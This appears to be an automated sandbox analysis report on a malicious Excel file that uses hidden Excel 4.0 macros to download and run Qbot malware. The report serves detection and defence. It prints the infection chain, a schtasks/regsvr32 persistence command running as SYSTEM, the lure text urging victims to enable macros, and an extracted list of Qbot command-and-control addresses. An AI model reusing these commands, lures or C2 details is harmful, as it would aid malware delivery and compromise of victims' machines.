Loading ...

Play interactive tourEdit tour

Analysis Report document-1055791644.xls

Overview

General Information

Sample Name:document-1055791644.xls
Analysis ID:382839
MD5:a1b03697f4c155ce81cbe1a4d8f87382
SHA1:c38536b8b88cb657f63a5c3ceb83586bd95f1b4b
SHA256:6083d754351ed13573a015a56de62a51d8755e4ada995406c89abdf5a85e7390
Tags:SilentBuilderxls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Schedule REGSVR windows binary
Yara detected Qbot
Allocates memory in foreign processes
Contains functionality to detect sleep reduction / modifications
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office process drops PE file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2268 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 1432 cmdline: rundll32 ..\iojhsfgv.dvers,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2360 cmdline: rundll32 ..\iojhsfgv.dvers,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • explorer.exe (PID: 2508 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2732 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2760 cmdline: taskeng.exe {E6DEB525-2047-4F0F-A2D9-FEDA7F895D14} S-1-5-18:NT AUTHORITY\System:Service: MD5: 65EA57712340C09B1B0C427B4848AE05)
    • regsvr32.exe (PID: 2888 cmdline: regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2880 cmdline: -s 'C:\Users\user\iojhsfgv.dvers' MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2364 cmdline: regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2288 cmdline: -s 'C:\Users\user\iojhsfgv.dvers' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

Threatname: Qbot

{"C2 list": ["176.205.222.30:2078", "174.76.188.217:22", "105.226.10.142:443", "87.202.87.210:2222", "203.194.110.74:443", "95.77.223.148:443", "45.77.115.208:2222", "47.146.169.85:443", "76.94.200.148:995", "23.240.70.80:443", "193.252.48.200:443", "154.124.130.140:995", "45.32.211.207:2222", "149.28.98.196:2222", "149.28.98.196:995", "149.28.101.90:995", "207.246.77.75:2222", "45.63.107.192:995", "173.70.165.101:995", "207.246.116.237:995", "149.28.99.97:2222", "149.28.101.90:8443", "207.246.116.237:443", "45.77.115.208:443", "45.32.211.207:8443", "207.246.77.75:8443", "149.28.101.90:443", "45.63.107.192:2222", "207.246.77.75:995", "149.28.99.97:995", "45.32.211.207:443", "144.202.38.185:443", "45.63.107.192:443", "149.28.101.90:2222", "149.28.99.97:443", "45.32.211.207:995", "207.246.116.237:2222", "207.246.116.237:8443", "149.28.98.196:443", "144.202.38.185:2222", "207.246.77.75:443", "144.202.38.185:995", "1.52.227.184:443", "184.189.122.72:443", "201.171.77.138:443", "208.126.142.17:443", "60.50.255.183:443", "172.78.30.215:443", "171.103.138.122:995", "92.59.35.196:2222", "176.181.247.197:443", "82.127.125.209:990", "45.77.115.208:8443", "45.77.115.208:995", "50.29.166.232:995", "172.87.157.235:3389", "85.58.200.50:2222", "196.151.252.84:443", "24.50.118.93:443", "103.51.20.143:2222", "86.236.77.68:2222", "78.63.226.32:443", "82.76.47.211:443", "76.25.142.196:443", "213.60.147.140:443", "151.33.233.193:443", "81.88.254.62:443", "70.126.76.75:443", "160.3.187.114:443", "41.205.16.1:443", "96.61.23.88:995", "86.98.93.124:2078", "2.232.253.79:995", "209.210.187.52:443", "188.25.63.105:443", "115.133.243.6:443", "27.223.92.142:995", "140.82.49.12:443", "80.11.173.82:8443", "2.7.69.217:2222", "190.85.91.154:443", "142.68.28.22:443", "89.211.252.190:995", "178.153.37.196:443", "79.129.121.81:995", "71.88.193.17:443", "86.160.137.132:443", "202.184.20.119:443", "83.110.12.140:2222", "115.69.252.0:22", "105.198.236.101:443", "144.139.47.206:443", "105.198.236.99:443", "197.45.110.165:995", "85.132.36.111:2222", "70.168.130.172:995", "71.187.170.235:443", "80.227.5.69:443", "59.90.246.200:443", "81.214.126.173:2222", "68.225.60.77:995", "108.31.15.10:995", "83.110.108.181:2222", "46.153.119.255:995", "216.201.162.158:443", "197.161.154.132:443", "96.21.251.127:2222", "75.136.40.155:443", "24.95.61.62:443", "68.186.192.69:443", "193.248.221.184:2222", "75.67.192.125:443", "81.97.154.100:443", "75.118.1.141:443", "47.22.148.6:443", "182.48.193.200:443", "203.198.96.37:443", "106.51.52.111:443", "83.110.103.152:443", "75.136.26.147:443", "2.50.2.216:443", "189.223.234.23:995", "74.222.204.82:995", "173.21.10.71:2222", "69.123.179.70:443", "71.74.12.34:443", "45.46.53.140:2222", "86.97.162.85:443", "2.51.171.223:443", "144.139.166.18:443", "71.197.126.250:443", "67.6.12.4:443", "122.148.156.131:995", "64.121.114.87:443", "50.244.112.106:443", "70.54.25.76:2222", "1.32.35.2:443", "89.137.211.239:995", "67.165.206.193:993", "186.28.51.27:443", "98.240.24.57:443", "109.12.111.14:443", "71.14.110.199:443", "94.53.92.42:443", "84.247.55.190:8443", "24.27.82.216:2222", "74.68.144.202:443", "196.221.207.137:995", "85.184.63.112:443", "67.8.103.21:443"], "Bot id": "tr", "Campaign": "1612776124"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1055791644.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4c2a2:$s1: Excel
  • 0x4d2f4:$s1: Excel
  • 0x38f2:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1055791644.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2102507416.0000000000420000.00000040.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      00000004.00000002.2102454877.0000000000230000.00000040.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
        00000004.00000002.2102490286.00000000003E0000.00000040.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
          00000005.00000002.2370755015.0000000000080000.00000040.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.230174.1.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
              4.2.rundll32.exe.420000.3.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                4.2.rundll32.exe.420000.3.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                  4.2.rundll32.exe.230174.1.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                    5.2.explorer.exe.80000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                      Click to see the 3 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Schedule REGSVR windows binaryShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2508, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54, ProcessId: 2732

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 4.2.rundll32.exe.230174.1.raw.unpackMalware Configuration Extractor: Qbot {"C2 list": ["176.205.222.30:2078", "174.76.188.217:22", "105.226.10.142:443", "87.202.87.210:2222", "203.194.110.74:443", "95.77.223.148:443", "45.77.115.208:2222", "47.146.169.85:443", "76.94.200.148:995", "23.240.70.80:443", "193.252.48.200:443", "154.124.130.140:995", "45.32.211.207:2222", "149.28.98.196:2222", "149.28.98.196:995", "149.28.101.90:995", "207.246.77.75:2222", "45.63.107.192:995", "173.70.165.101:995", "207.246.116.237:995", "149.28.99.97:2222", "149.28.101.90:8443", "207.246.116.237:443", "45.77.115.208:443", "45.32.211.207:8443", "207.246.77.75:8443", "149.28.101.90:443", "45.63.107.192:2222", "207.246.77.75:995", "149.28.99.97:995", "45.32.211.207:443", "144.202.38.185:443", "45.63.107.192:443", "149.28.101.90:2222", "149.28.99.97:443", "45.32.211.207:995", "207.246.116.237:2222", "207.246.116.237:8443", "149.28.98.196:443", "144.202.38.185:2222", "207.246.77.75:443", "144.202.38.185:995", "1.52.227.184:443", "184.189.122.72:443", "201.171.77.138:443", "208.126.142.17:443", "60.50.255.183:443", "172.78.30.215:443", "171.103.138.122:995", "92.59.35.196:2222", "176.181.247.197:443", "82.127.125.209:990", "45.77.115.208:8443", "45.77.115.208:995", "50.29.166.232:995", "172.87.157.235:3389", "85.58.200.50:2222", "196.151.252.84:443", "24.50.118.93:443", "103.51.20.143:2222", "86.236.77.68:2222", "78.63.226.32:443", "82.76.47.211:443", "76.25.142.196:443", "213.60.147.140:443", "151.33.233.193:443", "81.88.254.62:443", "70.126.76.75:443", "160.3.187.114:443", "41.205.16.1:443", "96.61.23.88:995", "86.98.93.124:2078", "2.232.253.79:995", "209.210.187.52:443", "188.25.63.105:443", "115.133.243.6:443", "27.223.92.142:995", "140.82.49.12:443", "80.11.173.82:8443", "2.7.69.217:2222", "190.85.91.154:443", "142.68.28.22:443", "89.211.252.190:995", "178.153.37.196:443", "79.129.121.81:995", "71.88.193.17:443", "86.160.137.132:443", "202.184.20.119:443", "83.110.12.140:2222", "115.69.252.0:22", "105.198.236.101:443", "144.139.47.206:443", "105.198.236.99:443", "197.45.110.165:995", "85.132.36.111:2222", "70.168.130.172:995", "71.187.170.235:443", "80.227.5.69:443", "59.90.246.200:443", "81.214.126.173:2222", "68.225.60.77:995", "108.31.15.10:995", "83.110.108.181:2222", "46.153.119.255:995", "216.201.162.158:443", "197.161.154.132:443", "96.21.251.127:2222", "75.136.40.155:443", "24.95.61.62:443", "68.186.192.69:443", "193.248.221.184:2222", "75.67.192.125:443", "81.97.154.100:443", "75.118.1.141:443", "47.22.148.6:443", "182.48.193.200:443", "203.198.96.37:443", "106.51.52.111:443", "83.110.103.152:443", "75.136.26.147:443", "2.50.2.216:443", "189.223.234.23:995", "74.222.204.82:995", "173.21.10.71:2222", "69.123.179.70:443", "71.74.12.34:443", "45.46.53.140:2222", "86.97.162.85:443", "2.51.171.223:443", "144.139.166.18:443", "71.197.126.250:443", "67.6.12.4:443", "122.148.156.131:995", "64.121.114.87:443", "50.244.112.106:443", "70.54.25.76:2222", "1.32.35.2:443", "89.137.211.239:995", "67.165.206.193:993", "186.28.51.27:443", "98.2
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gifMetadefender: Detection: 27%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gifReversingLabs: Detection: 93%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: document-1055791644.xlsVirustotal: Detection: 51%Perma Link
                      Source: document-1055791644.xlsReversingLabs: Detection: 47%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gifJoe Sandbox ML: detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: unknownHTTPS traffic detected: 103.50.162.157:443 -> 192.168.2.22:49165 version: TLS 1.2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00431217 lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,FindFirstFileW,MultiByteToWideChar,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,FindNextFileW,GetOEMCP,lstrcpynA,GetOEMCP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008A4F40 GetModuleHandleA,70D9FFF6,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00091217 lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,FindFirstFileW,MultiByteToWideChar,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,FindNextFileW,GetOEMCP,lstrcpynA,GetOEMCP,

                      Software Vulnerabilities:

                      barindex
                      Document exploit detected (drops PE files)Show sources
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 0702[1].gif.0.drJump to dropped file
                      Document exploit detected (UrlDownloadToFile)Show sources
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                      Document exploit detected (process start blacklist hit)Show sources
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
                      Source: excel.exeMemory has grown: Private usage: 4MB later: 46MB
                      Source: global trafficDNS query: name: tidymasters.com.au
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.50.162.157:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.50.162.157:443
                      Source: Joe Sandbox ViewIP Address: 103.50.162.157 103.50.162.157
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
                      Source: rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: tidymasters.com.au
                      Source: rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: rundll32.exe, 00000004.00000002.2108474827.0000000003620000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2371170734.00000000022D0000.00000002.00000001.sdmp, taskeng.exe, 00000009.00000002.2370918414.0000000000840000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: regsvr32.exe, 0000000A.00000002.2117402574.0000000000A30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: rundll32.exe, 00000004.00000002.2108474827.0000000003620000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2371170734.00000000022D0000.00000002.00000001.sdmp, taskeng.exe, 00000009.00000002.2370918414.0000000000840000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2116197122.0000000000D40000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                      Source: unknownHTTPS traffic detected: 103.50.162.157:443 -> 192.168.2.22:49165 version: TLS 1.2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008BEE8C GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EB0B0 GetKeyboardState,

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
                      Source: Screenshot number: 4Screenshot OCR: Enable Content X I F122 -',- jR V ^ Docu&^, THIS STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUME
                      Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
                      Source: Screenshot number: 8Screenshot OCR: Enable Content X Al " " jR " ^ Docu&nt THIS STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT,
                      Source: Screenshot number: 12Screenshot OCR: Enable Content X F312 " " jR " A B C D E F G H I J K L M N O P Q R S L=j 301 302 303 304 30
                      Found Excel 4.0 Macro with suspicious formulasShow sources
                      Source: document-1055791644.xlsInitial sample: EXEC
                      Office process drops PE fileShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\iojhsfgv.dvers
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gifJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004350CD MultiByteToWideChar,GetOEMCP,GetOEMCP,lstrcpynA,lstrcpynA,MultiByteToWideChar,lstrcpynA,lstrcpynA,memset,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrcpynA,NtProtectVirtualMemory,GetOEMCP,NtWriteVirtualMemory,GetOEMCP,GetOEMCP,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,GetOEMCP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00434981 lstrcpynA,GetOEMCP,lstrlenA,lstrlenA,GetCurrentProcessId,lstrlenA,GetOEMCP,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,GetOEMCP,lstrcpynA,MultiByteToWideChar,NtCreateSection,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,lstrcpynA,GetOEMCP,NtMapViewOfSection,lstrlenA,GetCurrentProcessId,lstrcpynA,GetCurrentProcess,NtUnmapViewOfSection,MultiByteToWideChar,GetOEMCP,NtClose,lstrcpynA,lstrcpynA,VirtualAllocEx,lstrlenA,GetCurrentProcessId,GetOEMCP,MultiByteToWideChar,WriteProcessMemory,memcpy,MultiByteToWideChar,lstrlenA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EE02C NtdllDefWindowProc_A,GetCapture,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008DA498 NtdllDefWindowProc_A,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008DACF0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008DAC40 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008C4FB8 NtdllDefWindowProc_A,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E3C20 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00434981
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004355A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00435A4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0043862B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004343F7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004340C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00441488
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0043B0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00439566
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00440D09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004305E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0042F267
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0042BA65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0042A60D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00431217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00433630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00436AFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00443AFF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0042C6FD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00441E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0043CABD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0043735C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0043AB20
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0043C7C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0042FBC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0042DBEC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0043BBFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00431F8B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0043D3B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008D4990
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008BB03C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E3C20
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0024C031
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0024606E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0024A094
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0023F138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0023D160
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0025027D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0024A623
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00243636
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0024078B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0023E7DB
